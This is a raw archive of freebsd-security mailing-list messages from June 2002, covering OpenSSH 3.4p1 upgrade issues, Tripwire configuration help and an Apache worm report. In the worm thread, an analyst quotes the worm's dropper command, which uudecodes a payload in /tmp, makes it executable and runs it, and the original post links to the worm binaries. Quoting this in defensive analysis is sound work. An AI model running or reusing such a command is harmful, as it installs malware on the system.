28 Jun 2002 07:12:38 -0700 (PDT) Received: from smnolde.com (c-24-98-61-182.atl.client2.attbi.com [24.98.61.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8173643E0F for ; Fri, 28 Jun 2002 07:12:36 -0700 (PDT) (envelope-from scott@smnolde.com) Received: from [192.168.10.7] (helo=bsd.smnolde.com) by smnolde.com with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.36 #1) id 17NwUG-000CDc-00 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 10:12:36 -0400 Received: from scott by bsd.smnolde.com with local (Exim 3.33 #1) id 17NwUF-00056J-00 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 10:12:35 -0400 Date: Fri, 28 Jun 2002 10:12:35 -0400 From: "Scott M. Nolde" To: freebsd-security@freebsd.org Subject: More OpenSSH weirdness Message-ID: <20020628101235.A19461@smnolde.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-GPG_Fingerprint: 0BD6 DDB4 2978 EB60 E0C8 33F2 BC34 9087 D869 AB48 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After installing openssh-portable 3.4p1 last night on my 4.6-STABLE systems I noticed two problems immediately: 1. Using compression with ssh would give the error: no matching comp found: client zlib server none 2. After I was able to log into the machine with a new ssh process sshd did not read $/.profile and some PATH stuff was left out. The workaround for (1) was to disable compression. But having (2) happen was very odd. Does anyone have any suggestions for this? I find it quite disturbing to upgrade from 3.3p1 to 3.4p1 and have things break like this. Any particular things I should watch out for? -- Scott Nolde GPG Key 0xD869AB48 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:15:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 633DB37B400 for ; Fri, 28 Jun 2002 07:15:13 -0700 (PDT) Received: from smnolde.com (c-24-98-61-182.atl.client2.attbi.com [24.98.61.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 049D043E06 for ; Fri, 28 Jun 2002 07:15:13 -0700 (PDT) (envelope-from scott@smnolde.com) Received: from [192.168.10.7] (helo=bsd.smnolde.com) by smnolde.com with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.36 #1) id 17NwWn-000CFA-00 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 10:15:13 -0400 Received: from scott by bsd.smnolde.com with local (Exim 3.33 #1) id 17NwWm-00057K-00 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 10:15:12 -0400 Date: Fri, 28 Jun 2002 10:15:12 -0400 From: "Scott M. Nolde" To: freebsd-security@freebsd.org Subject: Re: More OpenSSH weirdness Message-ID: <20020628101512.B19461@smnolde.com> References: <20020628101235.A19461@smnolde.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020628101235.A19461@smnolde.com>; from scott@smnolde.com on Fri, Jun 28, 2002 at 10:12:35AM -0400 X-GPG_Fingerprint: 0BD6 DDB4 2978 EB60 E0C8 33F2 BC34 9087 D869 AB48 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott M. Nolde(scott@smnolde.com)@2002.06.28 10:12:35 +0000: > > The workaround for (1) was to disable compression. But having (2) happen > was very odd. Does anyone have any suggestions for this? I find it quite > disturbing to upgrade from 3.3p1 to 3.4p1 and have things break like this. > Any particular things I should watch out for? > A new cvsup is underway to fix the compression issue with 3.4p1_1, but has anyone else seen sshd miss .profile? Scott Nolde GPG Key 0xD869AB48 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:34:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 725AD37B400 for ; Fri, 28 Jun 2002 07:34:51 -0700 (PDT) Received: from favour.one2net.co.ug (g-class.sanyutel.com [216.250.215.27]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9515943E14 for ; Fri, 28 Jun 2002 07:34:46 -0700 (PDT) (envelope-from ksemat@wawa.eahd.or.ug) Received: from localhost (localhost.one2net.co.ug [127.0.0.1]) by favour.one2net.co.ug (Postfix) with ESMTP id 4CFED54A63; Fri, 28 Jun 2002 17:33:20 +0300 (EAT) Date: Fri, 28 Jun 2002 17:33:20 +0300 (EAT) From: Noah K Sematimba X-X-Sender: ksemat@favour.one2net.co.ug To: peter.lai@uconn.edu Cc: "[brano]" , Chris Johnson , Subject: Re: OpenSSH_3.4p1 In-Reply-To: <20020628100811.A19147@cowbert.2y.net> Message-ID: <20020628173254.X4675-100000@favour.one2net.co.ug> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > and how can update only one port (not all ports) because I have modified > > more other ports to fix some problems. perhaps portcheckout or portupgrade? Noah. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:52:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A32037B400 for ; Fri, 28 Jun 2002 07:52:37 -0700 (PDT) Received: from mailg.telia.com (mailg.telia.com [194.22.194.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3783343E06 for ; Fri, 28 Jun 2002 07:52:36 -0700 (PDT) (envelope-from listsub@rambo.simx.org) Received: from rambo.simx.org (jenny.twenty4help.se [62.20.102.59]) by mailg.telia.com (8.11.6/8.11.6) with ESMTP id g5SEqW909848; Fri, 28 Jun 2002 16:52:32 +0200 (CEST) Message-ID: <3D1C7878.5010907@rambo.simx.org> Date: Fri, 28 Jun 2002 16:53:44 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Scott M. Nolde" Cc: freebsd-security@FreeBSD.ORG Subject: Re: More OpenSSH weirdness References: <20020628101235.A19461@smnolde.com> <20020628101512.B19461@smnolde.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott M. Nolde wrote: > Scott M. Nolde(scott@smnolde.com)@2002.06.28 10:12:35 +0000: > >>The workaround for (1) was to disable compression. But having (2) happen >>was very odd. Does anyone have any suggestions for this? I find it quite >>disturbing to upgrade from 3.3p1 to 3.4p1 and have things break like this. >>Any particular things I should watch out for? >> > > > A new cvsup is underway to fix the compression issue with 3.4p1_1, but has > anyone else seen sshd miss .profile? > > Scott Nolde > GPG Key 0xD869AB48 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Correct me if Im wrong, but .profile is read by the shell that sshd starts, not by sshd itself, right? Hi Scott btw :) -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:55:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A5AF037B401 for ; Fri, 28 Jun 2002 07:55:34 -0700 (PDT) Received: from smnolde.com (c-24-98-61-182.atl.client2.attbi.com [24.98.61.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F39743E0F for ; Fri, 28 Jun 2002 07:55:34 -0700 (PDT) (envelope-from scott@smnolde.com) Received: from [192.168.10.7] (helo=bsd.smnolde.com) by smnolde.com with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.36 #1) id 17Nx9q-000CUA-00; Fri, 28 Jun 2002 10:55:34 -0400 Received: from scott by bsd.smnolde.com with local (Exim 3.33 #1) id 17Nx9p-0008mw-00; Fri, 28 Jun 2002 10:55:33 -0400 Date: Fri, 28 Jun 2002 10:55:33 -0400 From: "Scott M. Nolde" To: Roger 'Rocky' Vetterberg Cc: freebsd-security@FreeBSD.ORG Subject: Re: More OpenSSH weirdness Message-ID: <20020628105533.C19461@smnolde.com> References: <20020628101235.A19461@smnolde.com> <20020628101512.B19461@smnolde.com> <3D1C7878.5010907@rambo.simx.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D1C7878.5010907@rambo.simx.org>; from listsub@rambo.simx.org on Fri, Jun 28, 2002 at 04:53:44PM +0200 X-GPG_Fingerprint: 0BD6 DDB4 2978 EB60 E0C8 33F2 BC34 9087 D869 AB48 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey Rocky, Quite possibly, but this didn't happen for previous versions of OpenSSH. And I'm still dealing with the compression issue with privsep enabled. - Scott Roger 'Rocky' Vetterberg(listsub@rambo.simx.org)@2002.06.28 16:53:44 +0000: > Scott M. Nolde wrote: > > Scott M. Nolde(scott@smnolde.com)@2002.06.28 10:12:35 +0000: > > > >>The workaround for (1) was to disable compression. But having (2) happen > >>was very odd. Does anyone have any suggestions for this? I find it quite > >>disturbing to upgrade from 3.3p1 to 3.4p1 and have things break like this. > >>Any particular things I should watch out for? > >> > > > > > > A new cvsup is underway to fix the compression issue with 3.4p1_1, but has > > anyone else seen sshd miss .profile? > > > > Correct me if Im wrong, but .profile is read by the shell that > sshd starts, not by sshd itself, right? > > Hi Scott btw :) > -- Scott Nolde GPG Key 0xD869AB48 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9: 2:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E05637B407 for ; Fri, 28 Jun 2002 09:02:02 -0700 (PDT) Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6E5143E16 for ; Fri, 28 Jun 2002 09:01:57 -0700 (PDT) (envelope-from Jan.Lentfer@web.de) Received: from [80.129.113.224] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NyC3-0004tG-00 for freebsd-security@FreeBSD.ORG; Fri, 28 Jun 2002 18:01:55 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id EB5DB3D3 for ; Fri, 28 Jun 2002 18:01:53 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id ADA603D2 for ; Fri, 28 Jun 2002 18:01:49 +0200 (CEST) Subject: Tripwire for Dummies From: Jan Lentfer To: FreeBSD Security Mailling List Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-ztCZibQ3cl9RDQPBBSdD" X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 28 Jun 2002 18:01:48 +0200 Message-Id: <1025280108.2819.27.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=-ztCZibQ3cl9RDQPBBSdD Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Hi all, could someone be so kind and point my nose to a configuration How-To of Tripwire for a dummie like me? Thanks a lot in advance, Jan Lentfer --=-ztCZibQ3cl9RDQPBBSdD Content-Type: application/pgp-signature; name=signature.asc Content-Description: Dies ist ein digital signierter Nachrichtenteil -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQA9HIhsN1wGzE0LIcgRAofzAKCgtmL3axRvOrmJHE76JfOQVEb93gCcCmu0 V2mMH6m446aNrs9zKDg+Ayw= =wqTC -----END PGP SIGNATURE----- --=-ztCZibQ3cl9RDQPBBSdD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9: 5:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1443C37B405 for ; Fri, 28 Jun 2002 09:05:43 -0700 (PDT) Received: from m-net.arbornet.org (m-net.arbornet.org [209.142.209.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7596243E09 for ; Fri, 28 Jun 2002 09:05:42 -0700 (PDT) (envelope-from polytarp@m-net.arbornet.org) Received: from m-net.arbornet.org (localhost [127.0.0.1]) by m-net.arbornet.org (8.12.3/8.11.2) with ESMTP id g5SG5g1H016316; Fri, 28 Jun 2002 12:05:42 -0400 (EDT) (envelope-from polytarp@m-net.arbornet.org) Received: from localhost (polytarp@localhost) by m-net.arbornet.org (8.12.3/8.12.3/Submit) with ESMTP id g5SG5fOc016312; Fri, 28 Jun 2002 12:05:42 -0400 (EDT) Date: Fri, 28 Jun 2002 12:05:41 -0400 (EDT) From: pgreen To: Jan Lentfer Cc: FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: <1025280108.2819.27.camel@jan-linux.lan> Message-ID: <20020628120524.I16249-100000@m-net.arbornet.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Stop being a self-efacer! On 28 Jun 2002, Jan Lentfer wrote: > Hi all, > > could someone be so kind and point my nose to a configuration How-To of > Tripwire for a dummie like me? > > Thanks a lot in advance, > > Jan Lentfer > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:21:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8600037B407 for ; Fri, 28 Jun 2002 09:21:07 -0700 (PDT) Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CCEB43E09 for ; Fri, 28 Jun 2002 09:21:07 -0700 (PDT) (envelope-from drama@slakin.net) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id 244234D5; Fri, 28 Jun 2002 09:21:09 -0700 (PDT) Date: Fri, 28 Jun 2002 09:21:09 -0700 (PDT) From: Matt Snow To: pgreen Cc: Jan Lentfer , FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: <20020628120524.I16249-100000@m-net.arbornet.org> Message-ID: <20020628091612.H19665-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think that -questions would have been a more appropriete list to query, but their is no need to be a such a schmuck. =P This Link is a bit outdated, but should still about to 4.5 and 4.6. http://www.defcon1.org/~ghostrdr/FreeBSD-STABLE_and_IPFILTER.html * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On Fri, 28 Jun 2002, pgreen wrote: > Stop being a self-efacer! > > On 28 Jun 2002, Jan Lentfer wrote: > > > Hi all, > > > > could someone be so kind and point my nose to a configuration How-To of > > Tripwire for a dummie like me? > > > > Thanks a lot in advance, > > > > Jan Lentfer > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:26:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by hub.freebsd.org (Postfix) with ESMTP id 0201A37B401 for ; Fri, 28 Jun 2002 09:26:11 -0700 (PDT) Received: by neptun.twoj.pl (Postfix, from userid 107) id A5DA43AC07; Fri, 28 Jun 2002 18:21:00 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27]) by neptun.twoj.pl (Postfix) with ESMTP id 271D83ABD3 for ; Fri, 28 Jun 2002 18:20:59 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id BDFABA31DA; Fri, 28 Jun 2002 09:56:01 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 19507 invoked from network); 28 Jun 2002 11:37:38 -0000 Date: Fri, 28 Jun 2002 13:38:34 +0200 From: flynn@energyhq.homeip.net To: Domas Mituzas Cc: freebsd-security@freebsd.org, bugtraq@securityfocus.com, os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild Message-ID: <20020628113834.GA10062@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="YZ5djTAD1cGYuMQK" Content-Disposition: inline In-Reply-To: <20020628125817.O68824-100000@axis.tdd.lt> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --YZ5djTAD1cGYuMQK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 01:01:32PM +0200, Domas Mituzas wrote: Hi, > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable apaches > it finds. No source code available yet, but I put the binaries into public Wow, an interesting puppy. I just ran it through dasm to get the assembler dump. The executable is not even stripped, and makes an interesting read, as it gives lots of information. It looks like it was either coded by someone with little experience or in a hurry, and there are several system calls like this one: Possible reference to string: "/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;ki= llall -9 .a;/ tmp/.a %s;exit;" I wonder how many variants of this kind of thing we'll see, but I assume mo= st people=20 running Apache have upgraded already. Cheers, --=20 Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk Of course it runs NetBSD! --YZ5djTAD1cGYuMQK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (NetBSD) iD8DBQE9HEq6nLctrNyFFPERAjclAKDAHtXw/OPpNX7kpot1s7pJaRH/5gCdF2y9 sOLrvAxOCTBRDYYsM0tq8Cs= =EsOg -----END PGP SIGNATURE----- --YZ5djTAD1cGYuMQK-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:28:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 721AE37B400 for ; Fri, 28 Jun 2002 09:28:15 -0700 (PDT) Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8FB5043E06 for ; Fri, 28 Jun 2002 09:28:14 -0700 (PDT) (envelope-from bugtraq-return-5389-cinek=goo.pl@securityfocus.com) Received: by neptun.twoj.pl (Postfix, from userid 107) id 63C553AC07; Fri, 28 Jun 2002 18:28:13 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27]) by neptun.twoj.pl (Postfix) with ESMTP id 2A6B33ABD3 for ; Fri, 28 Jun 2002 18:28:09 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id C32E0A31D9; Fri, 28 Jun 2002 09:55:53 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 15439 invoked from network); 28 Jun 2002 11:01:09 -0000 X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Fri, 28 Jun 2002 13:01:32 +0200 (EET) From: Domas Mituzas X-X-Sender: midom@axis.tdd.lt To: freebsd-security@freebsd.org Cc: bugtraq@securityfocus.com, Subject: Apache worm in the wild Message-ID: <20020628125817.O68824-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, our honeypot systems trapped new apache worm(+trojan) in the wild. It traverses through the net, and installs itself on all vulnerable apaches it finds. No source code available yet, but I put the binaries into public place, and more investigation is to be done. http://dammit.lt/apache-worm/ Regards, Domas Mituzas Central systems @ MicroLink Data To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:29: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CE68637B400 for ; Fri, 28 Jun 2002 09:28:59 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2AAD543E09 for ; Fri, 28 Jun 2002 09:28:59 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.4) with ESMTP id g5SGSXMX051363; Fri, 28 Jun 2002 12:28:33 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020628123102.041e17a0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 28 Jun 2002 12:31:34 -0400 To: flynn@energyhq.homeip.net From: Mike Tancsa Subject: Re: Apache worm in the wild Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020628113834.GA10062@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:38 PM 28/06/2002 +0200, flynn@energyhq.homeip.net wrote: >On Fri, Jun 28, 2002 at 01:01:32PM +0200, Domas Mituzas wrote: > >Hi, > > > our honeypot systems trapped new apache worm(+trojan) in the wild. It > > traverses through the net, and installs itself on all vulnerable apaches > > it finds. No source code available yet, but I put the binaries into public > >Wow, an interesting puppy. I just ran it through dasm to get the >assembler dump. The executable is not even stripped, and makes an Hi, Is this aimed at all OSes are just FreeBSD ? ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:33:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 96D4137B406 for ; Fri, 28 Jun 2002 09:33:28 -0700 (PDT) Received: from spqr.osg.gov.bc.ca (spqr.osg.gov.bc.ca [142.32.102.24]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB8E143E09 for ; Fri, 28 Jun 2002 09:33:27 -0700 (PDT) (envelope-from Cy.Schubert@osg.gov.bc.ca) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by spqr.osg.gov.bc.ca (Postfix) with ESMTP id 7FC0B9EF16; Fri, 28 Jun 2002 09:33:27 -0700 (PDT) Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.5/8.12.3) with ESMTP id g5SGXROX048331; Fri, 28 Jun 2002 09:33:27 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.5/8.12.3) with ESMTP id g5SGXQ4V001429; Fri, 28 Jun 2002 09:33:26 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200206281633.g5SGXQ4V001429@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-os: FreeBSD X-Sender: cy@cwsent.com To: Jan Lentfer Cc: FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: Message from Jan Lentfer of "28 Jun 2002 18:01:48 +0200." <1025280108.2819.27.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 28 Jun 2002 09:33:26 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <1025280108.2819.27.camel@jan-linux.lan>, Jan Lentfer writes: > Hi all, > > could someone be so kind and point my nose to a configuration How-To of > Tripwire for a dummie like me? > > Thanks a lot in advance, > > Jan Lentfer I'm assuming you're talking about configuring the Tripwire 2.3 port, not the 1.2 or 1.3 ports. If so, here is a good document to start you off. http://download.sourceforge.net/tripwire/tripwire-2.3.0-docs-pdf.tar.gz -- Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:35:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF9CF37B400 for ; Fri, 28 Jun 2002 09:35:48 -0700 (PDT) Received: from ms.voxeo.com (ms.voxeo.com [64.3.139.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EA5643E06 for ; Fri, 28 Jun 2002 09:35:48 -0700 (PDT) (envelope-from rj@voxeo.com) Received: from [64.220.201.59] (host59.voxeo.com [64.220.201.59]) by ms.voxeo.com (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTPA id <0GYF006KSCUWQP@ms.voxeo.com> for freebsd-security@freebsd.org; Fri, 28 Jun 2002 09:37:44 -0700 (PDT) Date: Fri, 28 Jun 2002 09:35:45 -0700 From: RJ Auburn Subject: Re: Apache worm in the wild In-reply-to: <20020628125817.O68824-100000@axis.tdd.lt> To: Domas Mituzas , freebsd-security@freebsd.org Cc: bugtrack , os_bsd@konferencijos.lt Message-id: MIME-version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT User-Agent: Microsoft-Entourage/10.1.0.2006 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is this only effecting freebsd right now? RJ -- RJ Auburn Chief Architect Voxeo Corporation On 06/28/02 04:01, "Domas Mituzas" wrote: > Hi, > > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable apaches > it finds. No source code available yet, but I put the binaries into public > place, and more investigation is to be done. > > http://dammit.lt/apache-worm/ > > Regards, > Domas Mituzas > > Central systems @ MicroLink Data > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:38:35 2002 Delivered-To: 